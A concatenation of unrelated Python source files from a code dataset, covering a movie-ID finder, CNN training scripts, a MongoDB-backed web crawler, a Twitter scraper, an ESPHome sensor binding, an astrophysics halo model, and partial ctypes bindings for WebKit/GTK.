allNum.append(determineShadeTest(img[2]))\n ltr.append((img[0], img[1], \",\" + str(determineShadeTest(img[2]))))\n \n print(len(allNum))\n print(allNum)\n return ltr\n","sub_path":"blockToSym.py","file_name":"blockToSym.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55386604","text":"import json\nimport re\nimport urllib\nimport urllib2\n\n\n\n#This class will find an IMDB Movie id given a movie title\n#It can be used to help correct erroneous movie titles\nclass IdFinder:\n\n def __init__(self):\n pass\n\n def _lookupSite(self, title):\n\n domain = \"imdb.com\"\n urlparser = \"imdb.com/title\\/(.*?)\\/\"\n #searchURL = \"http://www.google.com/search?q=site%%3A%s+%s\" % (domain, title)\n searchURL = \"http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=site%%3A%s+%s\" % (domain, title)\n return {\n \"domain\": domain,\n \"urlparser\": urlparser,\n \"searchURL\": searchURL,\n }\n\n def findIdByTitle(self, title):\n \"\"\" \"\"\"\n lookupSite = self._lookupSite(title)\n searchURL = lookupSite[\"searchURL\"]\n results = json.load(urllib.urlopen(searchURL))\n try:\n url = results['responseData']['results'][0]['url']\n IMDBId = re.search(lookupSite[\"urlparser\"], url).group(1)\n except:\n IMDBId = None\n\n return IMDBId\n\n def findIdByTitleList(self, titleList):\n idDict = {}\n for title in titleList:\n idDict[title] = self.findIdByTitle(title)\n return idDict\n\n\n","sub_path":"src/IdFinder.py","file_name":"IdFinder.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"56458054","text":"import time\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom lab2.tf_CNN import tf_CNN\nfrom lab2.CNN_cifar import CNN_cifar\nimport os\nfrom lab2.cifar_readdata import shuffle_data, unpickle, draw_image\nfrom 
data import Random2DGaussian\n\nDATA_DIR = 'C:\\\\Users\\\\Igor Farszky\\\\PycharmProjects\\\\duboko\\\\duboko_ucenje\\\\lab2\\\\train_dirs\\\\train_dir\\\\data_dir'\nCIFAR_DATA_DIR = 'C:\\\\Users\\\\Igor Farszky\\\\PycharmProjects\\\\duboko\\\\duboko_ucenje\\\\lab2\\\\cifar'\n\nimg_width = 32\nimg_height = 32\nnum_channels = 3\n\nconfig = {}\nconfig['max_epochs'] = 8\nconfig['batch_size'] = 50\nconfig['lr_policy'] = {1:{'lr':1e-1}, 3:{'lr':1e-2}, 5:{'lr':1e-3}, 7:{'lr':1e-4}}\n\ndef zad3() :\n np.random.seed(int(time.time() * 1e6) % 2 ** 31)\n\n dataset = input_data.read_data_sets(DATA_DIR, one_hot=True)\n\n train_x = dataset.train.images\n train_x = train_x.reshape([-1, 28, 28, 1])\n train_y = dataset.train.labels\n\n valid_x = dataset.validation.images\n valid_x = valid_x.reshape([-1, 28, 28, 1])\n valid_y = dataset.validation.labels\n\n test_x = dataset.test.images\n test_x = test_x.reshape([-1, 28, 28, 1])\n test_y = dataset.test.labels\n\n train_mean = train_x.mean()\n train_x -= train_mean\n valid_x -= train_mean\n test_x -= train_mean\n\n CNN = tf_CNN(num_input=50, num_classes=10)\n CNN.train(train_x, train_y, num_epochs=8, batch_size=100)\n CNN.predict(test_x)\n\n slika = test_x[0, :, :, 0]\n slika2 = test_x[len(test_x) - 1, :, :, 0]\n plt.figure(1)\n plt.imshow(slika, cmap=plt.get_cmap('gray'), vmin=0, vmax=1)\n plt.figure(2)\n plt.imshow(slika2, cmap=plt.get_cmap('gray'), vmin=0, vmax=1)\n plt.show()\n\ndef zad4():\n\n data = Random2DGaussian()\n\n train_x = np.ndarray((0, img_height * img_width * num_channels), dtype=np.float32)\n train_y = []\n for i in range(1, 6):\n subset = unpickle(os.path.join(CIFAR_DATA_DIR, 'data_batch_%d' % i))\n train_x = np.vstack((train_x, subset['dataset']))\n train_y += subset['labels']\n train_x = train_x.reshape((-1, num_channels, img_height, img_width)).transpose(0, 2, 3, 1)\n train_y = np.array(train_y, dtype=np.int32)\n\n subset = unpickle(os.path.join(CIFAR_DATA_DIR, 'test_batch'))\n test_x = 
subset['dataset'].reshape((-1, num_channels, img_height, img_width)).transpose(0, 2, 3, 1).astype(np.float32)\n test_y = np.array(subset['labels'], dtype=np.int32)\n test_yoh = data.class_to_onehot(test_y)\n\n valid_size = 5000\n train_x, train_y = shuffle_data(train_x, train_y)\n train_y = data.class_to_onehot(train_y)\n\n valid_x = train_x[:valid_size, ...]\n valid_y = train_y[:valid_size, ...]\n\n train_x = train_x[valid_size:, ...]\n train_y = train_y[valid_size:, ...]\n\n data_mean = train_x.mean((0, 1, 2))\n data_std = train_x.std((0, 1, 2))\n\n train_x = (train_x - data_mean) / data_std\n valid_x = (valid_x - data_mean) / data_std\n test_x = (test_x - data_mean) / data_std\n\n CNN = CNN_cifar(num_input=100, num_classes=10)\n CNN.train(train_x, train_y, valid_x, valid_y, num_epochs=8, batch_size=50)\n test_preds = CNN.predict(test_x)\n test_preds_classes = np.argmax(test_preds, axis=1)\n test_preds_maxes = [np.max(i) for i in test_preds]\n\n sorted_preds = list(reversed(sorted((e,i) for i,e in enumerate(test_preds_maxes))))\n netocni_indexi = []\n for i in sorted_preds:\n if test_preds_classes[i[1]] != test_y[i[1]]:\n netocni_indexi.append(i[1])\n\n iter = 0\n for key in netocni_indexi:\n if iter == 20:\n break\n\n net_index = key\n\n tocan_razred = test_y[net_index]\n pred_razred = test_preds_classes[net_index]\n print(\"predikcija={}, tocno={}\".format(pred_razred, tocan_razred))\n\n class_preds = list(reversed(sorted((e,i) for i,e in enumerate(test_preds[net_index]))))\n\n iter_class_preds = 3\n print_classes = ''\n for key_inner in class_preds:\n if iter_class_preds == 0:\n break\n print_classes += 'razred={} vjerojatnost={} :: '.format(key_inner[1], key_inner[0])\n iter_class_preds -= 1\n print(print_classes)\n print(\"\\n\")\n iter += 1\n\n slika = test_x[net_index, :, :, :]\n plt.figure(iter)\n draw_image(slika, data_mean, data_std)\n\nif __name__ == \"__main__\":\n\n # zad3()\n 
zad4()\n\n","sub_path":"lab2/main_lab2.py","file_name":"main_lab2.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317024279","text":"def averageFunc(globalAverage):\r\n print(\"Average Score is \" + str(globalAverage))\r\n\r\ndef averageProcessing(globalScoreCount, globalTotalScore):\r\n average = globalTotalScore / globalScoreCount\r\n \r\n return average\r\n\r\ndef inputFunc():\r\n print(\"Input Score count\")\r\n inputScoreCount = float(input())\r\n \r\n return inputScoreCount\r\n\r\ndef loopAverage(globalScoreCount):\r\n totalScore = 0\r\n newScoreCount = globalScoreCount\r\n while newScoreCount > 0:\r\n print(\"Input \" + str(newScoreCount) + \" number of scores\" + \"Total: \" + str(totalScore))\r\n inputScore = float(input())\r\n newScoreCount = newScoreCount - 1\r\n totalScore = totalScore + inputScore\r\n \r\n return totalScore\r\n\r\n# Main\r\n# A simple program that tells you the average of your scores\r\nglobalScoreCount = inputFunc()\r\nglobalTotalScore = loopAverage(globalScoreCount)\r\nglobalAverage = averageProcessing(globalScoreCount, globalTotalScore)\r\naverageFunc(globalAverage)\r\n","sub_path":"Assignment 9/Activity 2.py","file_name":"Activity 2.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"53152614","text":"from os.path import expanduser\nimport shutil\nimport os\nimport json\n\n\nglobal_image = {}\nimageLoaded = False\n\n\nclass MaskGenLoader:\n def __init__(self):\n self.load()\n\n def load(self):\n global global_image\n global imageLoaded\n if imageLoaded:\n return\n file_path = os.path.join(expanduser(\"~\"), \".maskgen2\")\n if os.path.exists(file_path):\n with open(file_path, \"r\") as jsonfile:\n global_image = json.load(jsonfile)\n imageLoaded = True\n\n def get_key(self, image_id, default_value=None):\n global global_image\n return 
global_image[image_id] if image_id in global_image else default_value\n\n def _backup(self):\n mainfile = os.path.join(expanduser(\"~\"), \".maskgen2\")\n backup = os.path.join(expanduser(\"~\"), \".maskgen2.bak\")\n if os.path.exists(mainfile):\n if os.path.exists(backup):\n # A mild protection against backing-up a corrupted file. These files do not shrink much normally\n mainsize = os.path.getsize(mainfile)\n backupsize = os.path.getsize(backup)\n okToBackup = mainsize >= 0.8*(backupsize)\n else:\n okToBackup= True\n else:\n okToBackup = False\n if (okToBackup):\n shutil.copy(mainfile,backup)\n\n def save(self, image_id, data):\n global global_image\n global_image[image_id] = data\n self._backup()\n file_path = os.path.join(expanduser(\"~\"), \".maskgen2\")\n with open(file_path, 'w') as f:\n json.dump(global_image, f, indent=2)\n\n def saveall(self, idanddata):\n global global_image\n for image_id, data in idanddata:\n global_image[image_id] = data\n file_path = os.path.join(expanduser(\"~\"), \".maskgen2\")\n self._backup()\n with open(file_path, 'w') as f:\n json.dump(global_image, f, indent=2)\n\ndef main():\n import sys\n loader = MaskGenLoader()\n args = sys.argv[1:]\n i = 0\n while i < len(args):\n id = args[i]\n v = args[i+1]\n loader.save(id,v)\n i+=2\n\nif __name__ == '__main__':\n main()\n","sub_path":"maskgen/maskgen_loader.py","file_name":"maskgen_loader.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"388196368","text":"def build_heap(array):\n heap_size = len(array)\n last_parent = (len(array) - 2) // 2\n for i in range(last_parent, -1, -1):\n heapify(array, i, heap_size)\n\n\ndef heapify(heap, i, heap_size):\n left, right = 2 * i + 1, 2 * i + 2\n max = i\n if left < heap_size and heap[left] > heap[i]:\n max = left\n if right < heap_size and heap[right] > heap[max]:\n max = right\n if i != max:\n heap[i], heap[max] = heap[max], heap[i]\n 
heapify(heap, max, heap_size)\n\n\ndef heap_sort(array, *_):\n build_heap(array)\n heap_size = len(array)\n for i in range(len(array) - 1, 0, -1):\n array[0], array[i] = array[i], array[0]\n heap_size -= 1\n heapify(array, 0, heap_size)\n","sub_path":"src/algorithms/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"130849297","text":"\n\nfrom xai.brain.wordbase.nouns._rump import _RUMP\n\n#calss header\nclass _RUMPS(_RUMP, ):\n\tdef __init__(self,): \n\t\t_RUMP.__init__(self)\n\t\tself.name = \"RUMPS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"rump\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_rumps.py","file_name":"_rumps.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"46365487","text":"from wagtail.wagtailcore.blocks import CharBlock\nfrom wagtail.wagtailcore.blocks import ChoiceBlock\nfrom wagtail.wagtailcore.blocks import StructBlock\nfrom wagtail.wagtailimages.blocks import ImageChooserBlock\nfrom .StructBlockWithStyle import StructBlockWithStyle\n\nIMAGE_STYLE_CHOICES = [\n ('max-width:225px;max-height:145px', 'Small'),\n ('max-width:225px;max-height:145px;padding-top:20px',\n 'Small Pushed Down 20px'),\n ('max_width:250px;max-height:250px', 'Medium'),\n ('max_width:250px;max-height:250px;padding-top:20px',\n 'Medium Pushed Down 20px'),\n ('height:auto', 'Shrink to Fit'),\n]\n\n\nclass COSPhotoStreamBlock(StructBlock):\n\n class Meta:\n template = 'common/blocks/flickr.html'\n icon = 'image'\n label = 'Photo Stream'\n\n\nclass ImageBlock(StructBlock):\n main_image = ImageChooserBlock()\n style = ChoiceBlock(choices=IMAGE_STYLE_CHOICES, default=\"height:auto\")\n url = CharBlock(max_length=250, required=False)\n\n class Meta:\n template = 'common/blocks/image_custom_block.html'\n icon = 'image'\n label 
= 'Image'\n\n\nclass CustomImageBlock(StructBlockWithStyle):\n\n main_image = ImageChooserBlock()\n url = CharBlock(max_length=250, required=False)\n\n class Meta:\n template = 'common/blocks/image_free_custom_block.html'\n icon = 'image'\n label = 'CustomImage'\n","sub_path":"common/blocks/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"260644710","text":"import time\nimport urllib.parse as urlparse\nimport threading\nimport multiprocessing\nfrom . import utils\nfrom . import db_cache\nfrom datetime import datetime, timedelta\nfrom pymongo import MongoClient, errors\n\nSLEEP_TIME = 1\n\n\n\nclass MongoQueue:\n \"\"\"\n >>> timeout = 1\n >>> url = 'http://example.webscraping.com'\n >>> q = MongoQueue(timeout=timeout)\n >>> q.clear() # ensure empty queue\n >>> q.push(url) # add test URL\n >>> q.peek() == q.pop() == url # pop back this URL\n True\n >>> q.repair() # immediate repair will do nothing\n >>> q.pop() # another pop should be empty\n >>> q.peek() \n >>> import time; time.sleep(timeout) # wait for timeout\n >>> q.repair() # now repair will release URL\n Released: test\n >>> q.pop() == url # pop URL again\n True\n >>> bool(q) # queue is still active while outstanding\n True\n >>> q.complete(url) # complete this URL\n >>> bool(q) # queue is not complete\n False\n \"\"\"\n\n # possible states of a download\n OUTSTANDING, PROCESSING, COMPLETE = range(3)\n\n def __init__(self, client=None, timeout=300):\n \"\"\"\n host: the host to connect to MongoDB\n port: the port to connect to MongoDB\n timeout: the number of seconds to allow for a timeout\n \"\"\"\n self.client = MongoClient() if client is None else client\n self.db = self.client.cache\n self.timeout = timeout\n\n def __nonzero__(self):\n \"\"\"Returns True if there are more jobs to process\n \"\"\"\n record = self.db.crawl_queue.find_one(\n {'status': {'$ne': self.COMPLETE}} \n 
)\n return True if record else False\n\n def push(self, url):\n \"\"\"Add new URL to queue if does not exist\n \"\"\"\n try:\n self.db.crawl_queue.insert({'_id': url, 'status': self.OUTSTANDING})\n except errors.DuplicateKeyError as e:\n pass # this is already in the queue\n\n def pop(self):\n \"\"\"Get an outstanding URL from the queue and set its status to processing.\n If the queue is empty a KeyError exception is raised.\n \"\"\"\n record = self.db.crawl_queue.find_and_modify(\n query={'status': self.OUTSTANDING}, \n update={'$set': {'status': self.PROCESSING, 'timestamp': datetime.now()}}\n )\n if record:\n return record['_id']\n else:\n self.repair()\n raise KeyError()\n\n def peek(self):\n record = self.db.crawl_queue.find_one({'status': self.OUTSTANDING})\n if record:\n return record['_id']\n\n def complete(self, url):\n self.db.crawl_queue.update({'_id': url}, {'$set': {'status': self.COMPLETE}})\n\n def repair(self):\n \"\"\"Release stalled jobs\n \"\"\"\n record = self.db.crawl_queue.find_and_modify(\n query={\n 'timestamp': {'$lt': datetime.now() - timedelta(seconds=self.timeout)},\n 'status': {'$ne': self.COMPLETE}\n },\n update={'$set': {'status': self.OUTSTANDING}}\n )\n if record:\n print('Released:', record['_id'])\n\n def clear(self):\n self.db.crawl_queue.drop()\n\ndef threaded_crawler1(seed_url, delay=5, cache=None, scrape_callback=None, user_agent='wswp', proxies=None, num_retries=1, max_threads=10, timeout=60):\n \"\"\"Crawl using multiple threads\n \"\"\"\n print(\"started\")\n # the queue of URL's that still need to be crawled\n crawl_queue = MongoQueue()\n crawl_queue.clear()\n crawl_queue.push(seed_url)\n cache = db_cache.DBCache()\n D = utils.Downloader(cache=cache, delay=delay, user_agent=user_agent, proxies=proxies, num_retries=num_retries, timeout=timeout)\n\n def process_queue():\n while True:\n # keep track that are processing url\n try:\n url = crawl_queue.pop()\n except KeyError:\n # currently no urls to process\n break\n else:\n 
html = D(url)\n if scrape_callback:\n try:\n links = scrape_callback(url, html) or []\n except Exception as e:\n print('Error in callback for: {}: {}'.format(url, e))\n else:\n for link in links:\n # add this new link to queue\n crawl_queue.push(utils.normalize(seed_url, link))\n crawl_queue.complete(url)\n\n\n # wait for all download threads to finish\n threads = []\n while threads or crawl_queue:\n for thread in threads:\n if not thread.is_alive():\n threads.remove(thread)\n while len(threads) < max_threads and crawl_queue.peek():\n # can start some more threads\n thread = threading.Thread(target=process_queue)\n thread.setDaemon(True) # set daemon so main thread can exit when receives ctrl-c\n thread.start()\n threads.append(thread)\n time.sleep(SLEEP_TIME)\n\n\ndef process_crawler(args, **kwargs):\n num_cpus = multiprocessing.cpu_count()\n #pool = multiprocessing.Pool(processes=num_cpus)\n print('Starting {} processes'.format(num_cpus))\n processes = []\n for i in range(num_cpus):\n p = multiprocessing.Process(target=threaded_crawler1, args=[args], kwargs=kwargs)\n #parsed = pool.apply_async(threaded_link_crawler, args, kwargs)\n p.start()\n processes.append(p)\n # wait for processes to complete\n for p in processes:\n p.join()","sub_path":"common/process_crawler.py","file_name":"process_crawler.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"491135762","text":"from twitterscraper import query_tweets\nimport datetime as dt\nimport pandas as pd\n\n# create list of hashtags in which to query tweets\nhashtags = ['samsunggalaxy', 'samsungunpacked', '#galaxyunpacked', '#galaxyS20',\n '#galaxyS10', '#galaxyS9', '#galaxyS8', '#unpacked2020', '#galaxyzflip',\n '#galaxyfold']\n\n# create lists of start and end dates to collect tweets at each point of the event\nbegin_date = [dt.date(2020,1,28), dt.date(2019,2,6), dt.date(2018,2,11),\n dt.date(2017,3,15)]\nend_date = 
[dt.date(2020,2,25), dt.date(2019,3,6), dt.date(2018,3,11),\n dt.date(2017,4,12)]\nlimit = 10000\nlang = 'english'\n\nall_frames = []\nfor i, hashtag in enumerate(hashtags):\n frames = []\n for x, date in enumerate(begin_date):\n try:\n tweets = query_tweets(hashtag, begindate=begin_date[x],\n enddate=end_date[x], limit=limit, lang=lang)\n df = pd.DataFrame(t.__dict__ for t in tweets)\n frames.append(df)\n except:\n pass\n all_frames.append(pd.concat(frames))\n print(f'Completed {i + 1} of {len(hashtags)} iterations...')\n\ntweets_df = pd.concat(all_frames)\ntweets_df.to_pickle(\"scraped_tweets.pkl\")","sub_path":"tweets_scrape.py","file_name":"tweets_scrape.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"270895337","text":"import esphome.codegen as cg\nimport esphome.config_validation as cv\nfrom esphome.components import binary_sensor\nfrom esphome.const import CONF_CHANNEL, CONF_ID\nfrom . 
import ttp229_bsf_ns, TTP229BSFComponent, CONF_TTP229_ID\n\nDEPENDENCIES = ['ttp229_bsf']\nTTP229BSFChannel = ttp229_bsf_ns.class_('TTP229BSFChannel', binary_sensor.BinarySensor)\n\nCONFIG_SCHEMA = binary_sensor.BINARY_SENSOR_SCHEMA.extend({\n cv.GenerateID(): cv.declare_id(TTP229BSFChannel),\n cv.GenerateID(CONF_TTP229_ID): cv.use_id(TTP229BSFComponent),\n cv.Required(CONF_CHANNEL): cv.int_range(min=0, max=15),\n})\n\n\ndef to_code(config):\n var = cg.new_Pvariable(config[CONF_ID])\n yield binary_sensor.register_binary_sensor(var, config)\n\n cg.add(var.set_channel(config[CONF_CHANNEL]))\n hub = yield cg.get_variable(config[CONF_TTP229_ID])\n cg.add(hub.register_channel(var))\n","sub_path":"esphome/components/ttp229_bsf/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"370471379","text":"import numpy as np\nfrom scipy.optimize import fsolve\nfrom scipy.optimize import root\nfrom functions import rho_isothermal, M_isothermal, find_r1, \\\n find_nfw, rho_joint_profiles, find_rho0, tage\n\ndef sidm_halo_model(r, N0, v0, sigma0):\n \"\"\"\n Calculates density profile for an SIDM halo\n assuming a truncation between an isothermal profile\n and an NFW profile at radius r1.\n\n Args:\n x : values over which the data/model is defined (radius, ri)\n N0 : Number of scatterings per particle [no units]\n v0 : 1D velocity dispersion [units km/s]\n sigma0 : cross section per unit mass [units cm^2/g]\n \"\"\"\n Msun_in_cgs = 1.98848e33\n kpc_in_cgs = 3.08567758e21\n\n t_age = 7.5\n #t_age = tage(logM200) # Gyr\n rho0 = find_rho0(N0, t_age, v0, sigma0)\n t_age_cgs = t_age * 1e9 * 365.24 * 24 * 3600 # sec\n rho0_cgs = rho0 * Msun_in_cgs / kpc_in_cgs ** 3 # g/cm^3\n\n G = 4.3e-6 # kpc km^2 Msun^-1 s^-2\n r0 = v0**2 / (4. 
* np.pi * G * rho0)\n r0 = np.sqrt(r0) # kpc\n\n sol = fsolve(find_r1, 20, args=(rho0_cgs, v0, t_age_cgs, sigma0))\n r1 = sol[0] * r0 # kpc\n\n M1 = M_isothermal(r1, r0, rho0) # Msun\n rho1 = rho0 * rho_isothermal( r1/r0 ) # Msun /kpc^3\n\n sol = root(find_nfw, [1, np.log10(rho0)], args=(r1, np.log10(rho1), np.log10(M1)),\n method='hybr', tol=1e-4)\n\n rs = sol.x[0]\n rhos = 10**sol.x[1]\n if rs < 0: rs = 1\n\n rho = rho_joint_profiles(r, r1, r0, rho0, rs, rhos)\n return np.log10(rho)\n\n\n\n","sub_path":"tests/discard_chains/sidm_model.py","file_name":"sidm_model.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"196225873","text":"# coding=utf-8\nimport configparser\nimport os\n\nclass Config:\n\n def __init__(self):\n _basedir = os.path.abspath(os.path.dirname(__file__))\n # pitop 配置文件\n sys_conf = os.path.join(_basedir, '../sys.conf')\n cf = configparser.ConfigParser()\n cf.read(sys_conf)\n self.cf = cf\n\n def read(self, key, value):\n return str(self.cf.get(key, value))\n","sub_path":"tools/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"543458030","text":"from torch.utils.data import Dataset\nimport torch\nfrom PIL import Image\nimport numpy as np\nimport os\nimport math\n\nfrom csv import DictReader\n\nclass MyDataset(Dataset):\n def __init__(self, version='it6',split='train', joint_transform=None, img_transform=None, url_csv_file=None, file_suffix=None):\n\n super().__init__()\n self.joint_transform = joint_transform\n self.img_transform = img_transform\n self.split = split\n self.images = []\n self.targets = [] \n self.version = '_'+version if split == 'train' else ''\n \n # LOAD SPLIT CSV FILE\n \n self.root_dir = url_csv_file\n with open(self.root_dir + self.split + file_suffix + self.version+ '.csv') as f:\n csv_file = 
DictReader(f)\n for row in csv_file:\n self.images.append(row[\"image_urls\"])\n self.targets.append(row[\"target_urls\"])\n\n \n \n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target)\n \"\"\"\n image = Image.open(self.images[index]) #.convert('RGB') \n target = Image.open(self.targets[index])\n \n # Convertir la PIL image a un tensor manualmente para que no haga la normalizacion \n if self.joint_transform is not None:\n image, target = self.joint_transform(image,target)\n target = torch.from_numpy(np.array(target))\n if self.img_transform is not None:\n image = self.img_transform(image)\n \n return image, target","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"567034587","text":"# Copyright, John Rusnak, 2012\n # This code binding is available under the license agreement of the LGPL with\n # an additional constraint described below,\n # and with the understanding that the webkit API is copyright protected\n # by Apple Computer, Inc. (see below).\n # There is an additional constraint that any derivatives of this work aimed\n # at providing bindings to GObject, GTK, GDK, or WebKit be strictly\n # python-only bindings with no native code.\n # * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY\n # * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n # * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n # * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. 
OR\n # * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n # * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n # * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n # * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n # * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n # * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n # * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n #\n # ******************************************************\n # For the API:\n # /*\n # * Copyright (C) 2006 Apple Computer, Inc. All rights reserved.\n # *\n # * Redistribution and use in source and binary forms, with or without\n # * modification, are permitted provided that the following conditions\n # * are met:\n # * 1. Redistributions of source code must retain the above copyright\n # * notice, this list of conditions and the following disclaimer.\n # * 2. Redistributions in binary form must reproduce the above copyright\n # * notice, this list of conditions and the following disclaimer in the\n # * documentation and/or other materials provided with the distribution.\n # *\n # * THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY\n # * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n # * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n # * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. 
OR\n # * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n # * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n # * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n # * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n # * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n # * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n # * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n # */\nfrom ctypes import *\nfrom gtk3_types import *\nfrom gobject_types import *\n \n \n\"\"\"Derived Pointer Types\"\"\"\n__GtkRcStyle = POINTER(c_int)\n__GdkGeometry = POINTER(c_int)\n_WebKitNetworkResponse = POINTER(c_int)\n_GdkPixbuf = POINTER(c_int)\n__GtkRequisition = POINTER(c_int)\n_GtkRcStyle = POINTER(c_int)\n__GtkRegionFlags = POINTER(c_int)\n__WebKitDOMNode = POINTER(c_int)\n_GtkWindow = POINTER(c_int)\n__cairo_font_options_t = POINTER(c_int)\n__JSValue = POINTER(c_int)\n_JSContext = POINTER(c_int)\n_GtkIconFactory = POINTER(c_int)\n__GdkAtom = POINTER(c_int)\n__GdkTimeCoord = POINTER(c_int)\n_GdkColor = POINTER(c_int)\n__GtkWidgetPath = POINTER(c_int)\n__GClosure = POINTER(c_int)\n__GMainContext = POINTER(c_int)\n_GdkDisplay = POINTER(c_int)\n__GtkStyleProvider = POINTER(c_int)\n_GtkDialog = POINTER(c_int)\n__WebKitWebWindowFeatures = POINTER(c_int)\n_JSObject = POINTER(c_int)\n_GBytes = POINTER(c_int)\n_GScanner = POINTER(c_int)\n_PangoFont = POINTER(c_int)\n_GtkStyleContext = POINTER(c_int)\n_GMainContext = POINTER(c_int)\n__GtkTextBuffer = POINTER(c_int)\n_GtkTargetList = POINTER(c_int)\n__WebKitWebSettings = POINTER(c_int)\n_GdkAppLaunchContext = POINTER(c_int)\n__GObject = POINTER(c_int)\n__PangoLayout = POINTER(c_int)\n_WebKitWebBackForwardList = POINTER(c_int)\n_GtkOffscreenWindow = POINTER(c_int)\n__GParamSpec = POINTER(c_int)\n__PangoAttrIterator = POINTER(c_int)\n_GtkIconSet = POINTER(c_int)\n_GtkSelectionData = 
POINTER(c_int)\n_GtkWindowGroup = POINTER(c_int)\n_JSGlobalContext = POINTER(c_int)\n_PangoLogAttr = POINTER(c_int)\n__PangoContext = POINTER(c_int)\n__JSPropertyNameArray = POINTER(c_int)\n_WebKitWebSettings = POINTER(c_int)\n__PangoFont = POINTER(c_int)\n__GtkPathPriorityType = POINTER(c_int)\n__JSClass = POINTER(c_int)\n__WebKitWebHistoryItem = POINTER(c_int)\n_JSValue = POINTER(c_int)\n__GtkSettings = POINTER(c_int)\n_GSource = POINTER(c_int)\n__PangoFontMap = POINTER(c_int)\n__JSString = POINTER(c_int)\n__PangoAttrList = POINTER(c_int)\n_PangoMatrix = POINTER(c_int)\n__GSource = POINTER(c_int)\n_GtkApplication = POINTER(c_int)\n__PangoAnalysis = POINTER(c_int)\n_PangoFontDescription = POINTER(c_int)\n__GdkCursor = POINTER(c_int)\n_GtkBorder = POINTER(c_int)\n_WebKitWebInspector = POINTER(c_int)\n_GOptionGroup = POINTER(c_int)\n__GScanner = POINTER(c_int)\n__GtkWidgetClass = POINTER(c_int)\n__GdkEventKey = POINTER(c_int)\n__GdkDisplay = POINTER(c_int)\n_GtkWidgetPath = POINTER(c_int)\n_GdkScreen = POINTER(c_int)\n_PangoFontMetrics = POINTER(c_int)\n_GdkVisual = POINTER(c_int)\n_PangoFontMap = POINTER(c_int)\n_GSList = POINTER(c_int)\n_WebKitWebFrame = POINTER(c_int)\n_JSString = POINTER(c_int)\n_GtkWidget = POINTER(c_int)\n__WebKitNetworkRequest = POINTER(c_int)\n__GdkWindow = POINTER(c_int)\n__PangoFontFamily = POINTER(c_int)\n__JSContextGroup = POINTER(c_int)\n__GPollFD = POINTER(c_int)\n__cairo_region_t = 